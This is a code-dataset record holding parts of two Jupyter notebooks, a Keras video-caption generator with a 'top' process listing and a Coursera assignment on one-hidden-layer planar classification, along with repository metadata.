################################################################################################ \n def save_model(self, model, epoch):\n # serialize model to JSON\n filename = \"Sentence_Generator_Model_Results/model_epoch_\"+str(epoch)+\".h5\"\n #with open(\"batch_model.json\", \"w\") as json_file:\n #json_file.write(model_json)\n # serialize weights to HDF5\n model.save_weights(filename)\n print(\"Saved model to disk\")\n \n ################################################################################################ \n def load_model(self, model, epoch):\n # load weights into new model\n filename = \"Sentence_Generator_Model_Results/model_epoch_\"+str(epoch)+\".h5\"\n model.load_weights(filename)\n print(\"Loaded model from disk\")\n return model\n \n ################################################################################################ \n def test(self, model, epoch):\n\n print(\"word : \",self.id2word[0])\n test_captions = []\n with open('MLDS_HW2/MLDS_hw2_data/testing_public_label.json') as data_file:\n testing_labels = json.load(data_file)\n \n files = []\n self.captions_in_each_video = []\n\n for i in range(len(testing_labels)):\n files.append(testing_labels[i]['id'])\n for j in range(len(testing_labels[i]['caption'])):\n test_captions.append(testing_labels[i]['caption'][j].lower().split(' '))\n self.captions_in_each_video.append(j)\n \n encoded_tensor = np.zeros((len(test_captions), self.max_sentence_length, self.vocabulary_size), dtype=np.float16)\n encoded_tensor[:,0,0] = 1\n\n print(\"number of files : \",len(files))\n #reading video features\n video_features = np.zeros((len(files),80,4096))\n \n print(\"shape : \",np.load(\"MLDS_HW2/MLDS_hw2_data/testing_data/feat/\"+files[0]+\".npy\").shape)\n\n for i in range(len(files)):\n video_features[i] = np.load(\"MLDS_HW2/MLDS_hw2_data/testing_data/feat/\"+files[i]+\".npy\")\n\n new_features = np.zeros((len(self.captions), 80, 4096))\n for i in range(len(self.captions_in_each_video)):\n for j in 
range(self.captions_in_each_video[i]):\n new_features[j] = video_features[i]\n \n new_features = np.reshape(new_features, (len(self.captions)*80, 1, 4096))\n \n\n #print(\"new_features : \", new_features.shape)\n encoded_tensor = np.repeat(encoded_tensor, 80, axis=0)\n\n embedded_input = self.embedding_layer(encoded_tensor)\n\n print(\"embedded_input : \", embedded_input.shape)\n print(\"video_features : \", new_features.shape)\n\n model = self.build_model()\n model = self.load_model(model)\n\n output = model.predict([embedded_input[:200,:,:], new_features[:200,:,:]])\n \n with open(\"Model_Results/Results/generated_text_epoch\"+str(epoch)+\".txt\", \"a\") as fileHandler:\n \n for i in range(200):\n text = \"\"\n for j in range(41):\n word = np.argmax(output[i,j,:])\n text += self.id2word[word]\n text += \" \"\n fileHandler.write(\"Generated text for example \",i,\" : \", text)\n fileHandler.write(\"\\n\")\n fileHandler.close() \n \n\n ################################################################################################\n\n\n\n# In[3]:\n\ncaption_generator = Caption_Generator()\n\n\n# In[ ]:\n\ncaption_generator.create_vocabulary()\n\n\n# In[ ]:\n\nmodel = caption_generator.train()\n\n\n# In[ ]:", "_____no_output_____" ], [ "!top", "\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[mtop - 06:22:12 up 1:41, 4 users, load average: 1.11, 0.35, 0.12\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nTasks:\u001b[m\u001b[m\u001b[1m 193 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 1 \u001b[m\u001b[mrunning,\u001b[m\u001b[m\u001b[1m 192 \u001b[m\u001b[msleeping,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mstopped,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mzombie\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n%Cpu(s):\u001b[m\u001b[m\u001b[1m 0.4 \u001b[m\u001b[mus,\u001b[m\u001b[m\u001b[1m 0.3 \u001b[m\u001b[msy,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mni,\u001b[m\u001b[m\u001b[1m 99.0 \u001b[m\u001b[mid,\u001b[m\u001b[m\u001b[1m 0.3 \u001b[m\u001b[mwa,\u001b[m\u001b[m\u001b[1m 
0.0 \u001b[m\u001b[mhi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[msi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mst\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Mem :\u001b[m\u001b[m\u001b[1m 26752224 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 24606748 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 584804 \u001b[m\u001b[mused,\u001b[m\u001b[m\u001b[1m 1560672 \u001b[m\u001b[mbuff/cache\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Swap:\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mused.\u001b[m\u001b[m\u001b[1m 25745880 \u001b[m\u001b[mavail Mem \u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n\u001b[K\n\u001b[7m PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND \u001b[m\u001b[m\u001b[K\n\u001b[m 3645 narain.+ 20 0 304328 56088 12332 S 6.7 0.2 0:01.78 jupyter-no+ \u001b[m\u001b[m\u001b[K\n\u001b[m 1 root 20 0 119952 6100 3976 S 0.0 0.0 0:07.39 systemd \u001b[m\u001b[m\u001b[K\n\u001b[m 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd \u001b[m\u001b[m\u001b[K\n\u001b[m 4 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:+ \u001b[m\u001b[m\u001b[K\n\u001b[m 6 root 20 0 0 0 0 S 0.0 0.0 0:00.02 ksoftirqd/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 7 root 20 0 0 0 0 S 0.0 0.0 0:00.12 rcu_sched \u001b[m\u001b[m\u001b[K\n\u001b[m 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rcu_bh \u001b[m\u001b[m\u001b[K\n\u001b[m 9 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 10 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 lru-add-dr+ \u001b[m\u001b[m\u001b[K\n\u001b[m 11 root rt 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 14 root rt 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 15 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 16 root 20 0 
0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 18 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/1:+ \u001b[m\u001b[m\u001b[K\n\u001b[m 19 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/2 \u001b[m\u001b[m\u001b[K\u001b[H\u001b[mtop - 06:22:15 up 1:41, 4 users, load average: 1.11, 0.35, 0.12\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nTasks:\u001b[m\u001b[m\u001b[1m 193 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 1 \u001b[m\u001b[mrunning,\u001b[m\u001b[m\u001b[1m 192 \u001b[m\u001b[msleeping,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mstopped,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mzombie\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n%Cpu(s):\u001b[m\u001b[m\u001b[1m 0.4 \u001b[m\u001b[mus,\u001b[m\u001b[m\u001b[1m 0.2 \u001b[m\u001b[msy,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mni,\u001b[m\u001b[m\u001b[1m 99.0 \u001b[m\u001b[mid,\u001b[m\u001b[m\u001b[1m 0.4 \u001b[m\u001b[mwa,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mhi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[msi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mst\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Mem :\u001b[m\u001b[m\u001b[1m 26752224 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 24606688 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 584772 \u001b[m\u001b[mused,\u001b[m\u001b[m\u001b[1m 1560764 \u001b[m\u001b[mbuff/cache\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Swap:\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mused.\u001b[m\u001b[m\u001b[1m 25745940 \u001b[m\u001b[mavail Mem \u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n\u001b[K\n\n\u001b[m 3741 narain.+ 20 0 598636 47232 11280 S 1.3 0.2 0:00.82 python3 \u001b[m\u001b[m\u001b[K\n\u001b[m 2519 root -51 0 0 0 0 S 0.3 0.0 0:11.24 irq/37-nvi+ \u001b[m\u001b[m\u001b[K\n\u001b[m\u001b[1m 4348 narain.+ 20 0 40520 3740 3132 R 0.3 0.0 0:00.01 top \u001b[m\u001b[m\u001b[K\n\u001b[m 1 root 20 0 119952 6100 3976 S 0.0 0.0 0:07.39 systemd 
\u001b[m\u001b[m\u001b[K\n\u001b[m 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd \u001b[m\u001b[m\u001b[K\n\u001b[m 4 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:+ \u001b[m\u001b[m\u001b[K\n\u001b[m 6 root 20 0 0 0 0 S 0.0 0.0 0:00.02 ksoftirqd/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 7 root 20 0 0 0 0 S 0.0 0.0 0:00.12 rcu_sched \u001b[m\u001b[m\u001b[K\n\u001b[m 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rcu_bh \u001b[m\u001b[m\u001b[K\n\u001b[m 9 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 10 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 lru-add-dr+ \u001b[m\u001b[m\u001b[K\n\u001b[m 11 root rt 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 14 root rt 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 15 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 16 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/1 \u001b[m\u001b[m\u001b[K\u001b[H\u001b[mtop - 06:22:18 up 1:41, 4 users, load average: 1.02, 0.35, 0.12\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n\n%Cpu(s):\u001b[m\u001b[m\u001b[1m 0.4 \u001b[m\u001b[mus,\u001b[m\u001b[m\u001b[1m 0.2 \u001b[m\u001b[msy,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mni,\u001b[m\u001b[m\u001b[1m 99.4 \u001b[m\u001b[mid,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mwa,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mhi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[msi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mst\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Mem :\u001b[m\u001b[m\u001b[1m 26752224 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 24606720 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 584744 \u001b[m\u001b[mused,\u001b[m\u001b[m\u001b[1m 1560760 \u001b[m\u001b[mbuff/cache\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Swap:\u001b[m\u001b[m\u001b[1m 0 
\u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mused.\u001b[m\u001b[m\u001b[1m 25745964 \u001b[m\u001b[mavail Mem \u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n\u001b[K\n\n\u001b[m 3741 narain.+ 20 0 598636 47232 11280 S 2.0 0.2 0:00.88 python3 \u001b[m\u001b[m\u001b[K\n\u001b[m 3028 root 20 0 304464 60808 12320 S 0.3 0.2 0:05.03 jupyter-no+ \u001b[m\u001b[m\u001b[K\n\u001b[m 1 root 20 0 119952 6100 3976 S 0.0 0.0 0:07.39 systemd \u001b[m\u001b[m\u001b[K\n\u001b[m 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd \u001b[m\u001b[m\u001b[K\n\u001b[m 4 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:+ \u001b[m\u001b[m\u001b[K\n\u001b[m 6 root 20 0 0 0 0 S 0.0 0.0 0:00.02 ksoftirqd/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 7 root 20 0 0 0 0 S 0.0 0.0 0:00.12 rcu_sched \u001b[m\u001b[m\u001b[K\n\u001b[m 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rcu_bh \u001b[m\u001b[m\u001b[K\n\u001b[m 9 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 10 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 lru-add-dr+ \u001b[m\u001b[m\u001b[K\n\u001b[m 11 root rt 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 14 root rt 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 15 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 16 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 18 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/1:+ \u001b[m\u001b[m\u001b[K\u001b[H\u001b[mtop - 06:22:21 up 1:41, 4 users, load average: 0.94, 0.34, 0.12\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n\n%Cpu(s):\u001b[m\u001b[m\u001b[1m 0.5 \u001b[m\u001b[mus,\u001b[m\u001b[m\u001b[1m 0.3 \u001b[m\u001b[msy,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mni,\u001b[m\u001b[m\u001b[1m 97.4 
\u001b[m\u001b[mid,\u001b[m\u001b[m\u001b[1m 1.8 \u001b[m\u001b[mwa,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mhi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[msi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mst\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Mem :\u001b[m\u001b[m\u001b[1m 26752224 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 24606148 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 583912 \u001b[m\u001b[mused,\u001b[m\u001b[m\u001b[1m 1562164 \u001b[m\u001b[mbuff/cache\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Swap:\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mused.\u001b[m\u001b[m\u001b[1m 25746696 \u001b[m\u001b[mavail Mem \u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n\u001b[K\n\n\u001b[m 3741 narain.+ 20 0 598636 47232 11280 S 1.7 0.2 0:00.93 python3 \u001b[m\u001b[m\u001b[K\n\u001b[m 3028 root 20 0 304464 60808 12320 S 1.3 0.2 0:05.07 jupyter-no+ \u001b[m\u001b[m\u001b[K\n\u001b[m 2519 root -51 0 0 0 0 S 0.3 0.0 0:11.25 irq/37-nvi+ \u001b[m\u001b[m\u001b[K\n\u001b[m 3220 srihars+ 20 0 97824 5180 3756 S 0.3 0.0 0:00.32 sshd \u001b[m\u001b[m\u001b[K\n\u001b[m\u001b[1m 4348 narain.+ 20 0 40520 3740 3132 R 0.3 0.0 0:00.02 top \u001b[m\u001b[m\u001b[K\n\u001b[m 1 root 20 0 119952 6100 3976 S 0.0 0.0 0:07.39 systemd \u001b[m\u001b[m\u001b[K\n\u001b[m 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd \u001b[m\u001b[m\u001b[K\n\u001b[m 4 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:+ \u001b[m\u001b[m\u001b[K\n\u001b[m 6 root 20 0 0 0 0 S 0.0 0.0 0:00.02 ksoftirqd/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 7 root 20 0 0 0 0 S 0.0 0.0 0:00.12 rcu_sched \u001b[m\u001b[m\u001b[K\n\u001b[m 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rcu_bh \u001b[m\u001b[m\u001b[K\n\u001b[m 9 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 10 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 lru-add-dr+ \u001b[m\u001b[m\u001b[K\n\u001b[m 11 root rt 0 0 0 0 S 0.0 0.0 0:00.00 
watchdog/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/1 \u001b[m\u001b[m\u001b[K\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ] ]
e72e9311412bc664e947f7e652cb1579ec28055d
562,829
ipynb
Jupyter Notebook
Neural-Networks-and-Deep-Learning/Week 3/Planar_data_classification_with_onehidden_layer.ipynb
vishwapardeshi/Deep-Learning
bedd373cab2dbeaa82441c32a4e983aa99afbcfe
[ "MIT" ]
1
2021-01-21T07:03:54.000Z
2021-01-21T07:03:54.000Z
Neural-Networks-and-Deep-Learning/Week 3/Planar_data_classification_with_onehidden_layer.ipynb
vishwapardeshi/Deep-Learning
bedd373cab2dbeaa82441c32a4e983aa99afbcfe
[ "MIT" ]
null
null
null
Neural-Networks-and-Deep-Learning/Week 3/Planar_data_classification_with_onehidden_layer.ipynb
vishwapardeshi/Deep-Learning
bedd373cab2dbeaa82441c32a4e983aa99afbcfe
[ "MIT" ]
null
null
null
351.988118
331,108
0.914365
[ [ [ "\n### <font color = \"darkblue\">Updates to Assignment</font>\n\n#### If you were working on the older version:\n* Please click on the \"Coursera\" icon in the top right to open up the folder directory. \n* Navigate to the folder: Week 3/ Planar data classification with one hidden layer. You can see your prior work in version 6b: \"Planar data classification with one hidden layer v6b.ipynb\"\n\n#### List of bug fixes and enhancements\n* Clarifies that the classifier will learn to classify regions as either red or blue.\n* compute_cost function fixes np.squeeze by casting it as a float.\n* compute_cost instructions clarify the purpose of np.squeeze.\n* compute_cost clarifies that \"parameters\" parameter is not needed, but is kept in the function definition until the auto-grader is also updated.\n* nn_model removes extraction of parameter values, as the entire parameter dictionary is passed to the invoked functions.", "_____no_output_____" ], [ "# Planar data classification with one hidden layer\n\nWelcome to your week 3 programming assignment. It's time to build your first neural network, which will have a hidden layer. You will see a big difference between this model and the one you implemented using logistic regression. \n\n**You will learn how to:**\n- Implement a 2-class classification neural network with a single hidden layer\n- Use units with a non-linear activation function, such as tanh \n- Compute the cross entropy loss \n- Implement forward and backward propagation\n", "_____no_output_____" ], [ "## 1 - Packages ##\n\nLet's first import all the packages that you will need during this assignment.\n- [numpy](https://www.numpy.org/) is the fundamental package for scientific computing with Python.\n- [sklearn](http://scikit-learn.org/stable/) provides simple and efficient tools for data mining and data analysis. 
\n- [matplotlib](http://matplotlib.org) is a library for plotting graphs in Python.\n- testCases provides some test examples to assess the correctness of your functions\n- planar_utils provide various useful functions used in this assignment", "_____no_output_____" ] ], [ [ "# Package imports\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom testCases_v2 import *\nimport sklearn\nimport sklearn.datasets\nimport sklearn.linear_model\nfrom planar_utils import plot_decision_boundary, sigmoid, load_planar_dataset, load_extra_datasets\n\n%matplotlib inline\n\nnp.random.seed(1) # set a seed so that the results are consistent", "_____no_output_____" ] ], [ [ "## 2 - Dataset ##\n\nFirst, let's get the dataset you will work on. The following code will load a \"flower\" 2-class dataset into variables `X` and `Y`.", "_____no_output_____" ] ], [ [ "X, Y = load_planar_dataset()", "_____no_output_____" ] ], [ [ "Visualize the dataset using matplotlib. The data looks like a \"flower\" with some red (label y=0) and some blue (y=1) points. Your goal is to build a model to fit this data. In other words, we want the classifier to define regions as either red or blue.", "_____no_output_____" ] ], [ [ "# Visualize the data:\nplt.scatter(X[0, :], X[1, :], c=Y, s=40, cmap=plt.cm.Spectral);", "_____no_output_____" ] ], [ [ "You have:\n - a numpy-array (matrix) X that contains your features (x1, x2)\n - a numpy-array (vector) Y that contains your labels (red:0, blue:1).\n\nLets first get a better sense of what our data is like. \n\n**Exercise**: How many training examples do you have? In addition, what is the `shape` of the variables `X` and `Y`? \n\n**Hint**: How do you get the shape of a numpy array? 
[(help)](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.shape.html)", "_____no_output_____" ] ], [ [ "### START CODE HERE ### (≈ 3 lines of code)\nshape_X = X.shape\nshape_Y = Y.shape\nm = X.shape[1] # training set size\n### END CODE HERE ###\n\nprint ('The shape of X is: ' + str(shape_X))\nprint ('The shape of Y is: ' + str(shape_Y))\nprint ('I have m = %d training examples!' % (m))", "The shape of X is: (2, 400)\nThe shape of Y is: (1, 400)\nI have m = 400 training examples!\n" ] ], [ [ "**Expected Output**:\n \n<table style=\"width:20%\">\n \n <tr>\n <td>**shape of X**</td>\n <td> (2, 400) </td> \n </tr>\n \n <tr>\n <td>**shape of Y**</td>\n <td>(1, 400) </td> \n </tr>\n \n <tr>\n <td>**m**</td>\n <td> 400 </td> \n </tr>\n \n</table>", "_____no_output_____" ], [ "## 3 - Simple Logistic Regression\n\nBefore building a full neural network, lets first see how logistic regression performs on this problem. You can use sklearn's built-in functions to do that. Run the code below to train a logistic regression classifier on the dataset.", "_____no_output_____" ] ], [ [ "# Train the logistic regression classifier\nclf = sklearn.linear_model.LogisticRegressionCV();\nclf.fit(X.T, Y.T);", "_____no_output_____" ] ], [ [ "You can now plot the decision boundary of these models. 
Run the code below.", "_____no_output_____" ] ], [ [ "# Plot the decision boundary for logistic regression\nplot_decision_boundary(lambda x: clf.predict(x), X, Y)\nplt.title(\"Logistic Regression\")\n\n# Print accuracy\nLR_predictions = clf.predict(X.T)\nprint ('Accuracy of logistic regression: %d ' % float((np.dot(Y,LR_predictions) + np.dot(1-Y,1-LR_predictions))/float(Y.size)*100) +\n '% ' + \"(percentage of correctly labelled datapoints)\")", "Accuracy of logistic regression: 47 % (percentage of correctly labelled datapoints)\n" ] ], [ [ "**Expected Output**:\n\n<table style=\"width:20%\">\n <tr>\n <td>**Accuracy**</td>\n <td> 47% </td> \n </tr>\n \n</table>\n", "_____no_output_____" ], [ "**Interpretation**: The dataset is not linearly separable, so logistic regression doesn't perform well. Hopefully a neural network will do better. Let's try this now! ", "_____no_output_____" ], [ "## 4 - Neural Network model\n\nLogistic regression did not work well on the \"flower dataset\". You are going to train a Neural Network with a single hidden layer.\n\n**Here is our model**:\n<img src=\"images/classification_kiank.png\" style=\"width:600px;height:300px;\">\n\n**Mathematically**:\n\nFor one example $x^{(i)}$:\n$$z^{[1] (i)} = W^{[1]} x^{(i)} + b^{[1]}\\tag{1}$$ \n$$a^{[1] (i)} = \\tanh(z^{[1] (i)})\\tag{2}$$\n$$z^{[2] (i)} = W^{[2]} a^{[1] (i)} + b^{[2]}\\tag{3}$$\n$$\\hat{y}^{(i)} = a^{[2] (i)} = \\sigma(z^{ [2] (i)})\\tag{4}$$\n$$y^{(i)}_{prediction} = \\begin{cases} 1 & \\mbox{if } a^{[2](i)} > 0.5 \\\\ 0 & \\mbox{otherwise } \\end{cases}\\tag{5}$$\n\nGiven the predictions on all the examples, you can also compute the cost $J$ as follows: \n$$J = - \\frac{1}{m} \\sum\\limits_{i = 0}^{m} \\large\\left(\\small y^{(i)}\\log\\left(a^{[2] (i)}\\right) + (1-y^{(i)})\\log\\left(1- a^{[2] (i)}\\right) \\large \\right) \\small \\tag{6}$$\n\n**Reminder**: The general methodology to build a Neural Network is to:\n 1. 
Define the neural network structure ( # of input units, # of hidden units, etc). \n 2. Initialize the model's parameters\n 3. Loop:\n - Implement forward propagation\n - Compute loss\n - Implement backward propagation to get the gradients\n - Update parameters (gradient descent)\n\nYou often build helper functions to compute steps 1-3 and then merge them into one function we call `nn_model()`. Once you've built `nn_model()` and learnt the right parameters, you can make predictions on new data.", "_____no_output_____" ], [ "### 4.1 - Defining the neural network structure ####\n\n**Exercise**: Define three variables:\n - n_x: the size of the input layer\n - n_h: the size of the hidden layer (set this to 4) \n - n_y: the size of the output layer\n\n**Hint**: Use shapes of X and Y to find n_x and n_y. Also, hard code the hidden layer size to be 4.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: layer_sizes\n\ndef layer_sizes(X, Y):\n \"\"\"\n Arguments:\n X -- input dataset of shape (input size, number of examples)\n Y -- labels of shape (output size, number of examples)\n \n Returns:\n n_x -- the size of the input layer\n n_h -- the size of the hidden layer\n n_y -- the size of the output layer\n \"\"\"\n ### START CODE HERE ### (≈ 3 lines of code)\n n_x = X.shape[0] # size of input layer\n n_h = 4\n n_y = Y.shape[0] # size of output layer\n ### END CODE HERE ###\n return (n_x, n_h, n_y)", "_____no_output_____" ], [ "X_assess, Y_assess = layer_sizes_test_case()\n(n_x, n_h, n_y) = layer_sizes(X_assess, Y_assess)\nprint(\"The size of the input layer is: n_x = \" + str(n_x))\nprint(\"The size of the hidden layer is: n_h = \" + str(n_h))\nprint(\"The size of the output layer is: n_y = \" + str(n_y))", "The size of the input layer is: n_x = 5\nThe size of the hidden layer is: n_h = 4\nThe size of the output layer is: n_y = 2\n" ] ], [ [ "**Expected Output** (these are not the sizes you will use for your network, they are just used to assess the function you've just 
coded).\n\n<table style=\"width:20%\">\n <tr>\n <td>**n_x**</td>\n <td> 5 </td> \n </tr>\n \n <tr>\n <td>**n_h**</td>\n <td> 4 </td> \n </tr>\n \n <tr>\n <td>**n_y**</td>\n <td> 2 </td> \n </tr>\n \n</table>", "_____no_output_____" ], [ "### 4.2 - Initialize the model's parameters ####\n\n**Exercise**: Implement the function `initialize_parameters()`.\n\n**Instructions**:\n- Make sure your parameters' sizes are right. Refer to the neural network figure above if needed.\n- You will initialize the weights matrices with random values. \n - Use: `np.random.randn(a,b) * 0.01` to randomly initialize a matrix of shape (a,b).\n- You will initialize the bias vectors as zeros. \n - Use: `np.zeros((a,b))` to initialize a matrix of shape (a,b) with zeros.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: initialize_parameters\n\ndef initialize_parameters(n_x, n_h, n_y):\n \"\"\"\n Argument:\n n_x -- size of the input layer\n n_h -- size of the hidden layer\n n_y -- size of the output layer\n \n Returns:\n params -- python dictionary containing your parameters:\n W1 -- weight matrix of shape (n_h, n_x)\n b1 -- bias vector of shape (n_h, 1)\n W2 -- weight matrix of shape (n_y, n_h)\n b2 -- bias vector of shape (n_y, 1)\n \"\"\"\n \n np.random.seed(2) # we set up a seed so that your output matches ours although the initialization is random.\n \n ### START CODE HERE ### (≈ 4 lines of code)\n W1 = np.random.randn(n_h, n_x) * 0.01\n b1 = np.zeros((n_h, 1))\n W2 = np.random.randn(n_y, n_h) * 0.01\n b2 = np.zeros((n_y, 1))\n ### END CODE HERE ###\n \n assert (W1.shape == (n_h, n_x))\n assert (b1.shape == (n_h, 1))\n assert (W2.shape == (n_y, n_h))\n assert (b2.shape == (n_y, 1))\n \n parameters = {\"W1\": W1,\n \"b1\": b1,\n 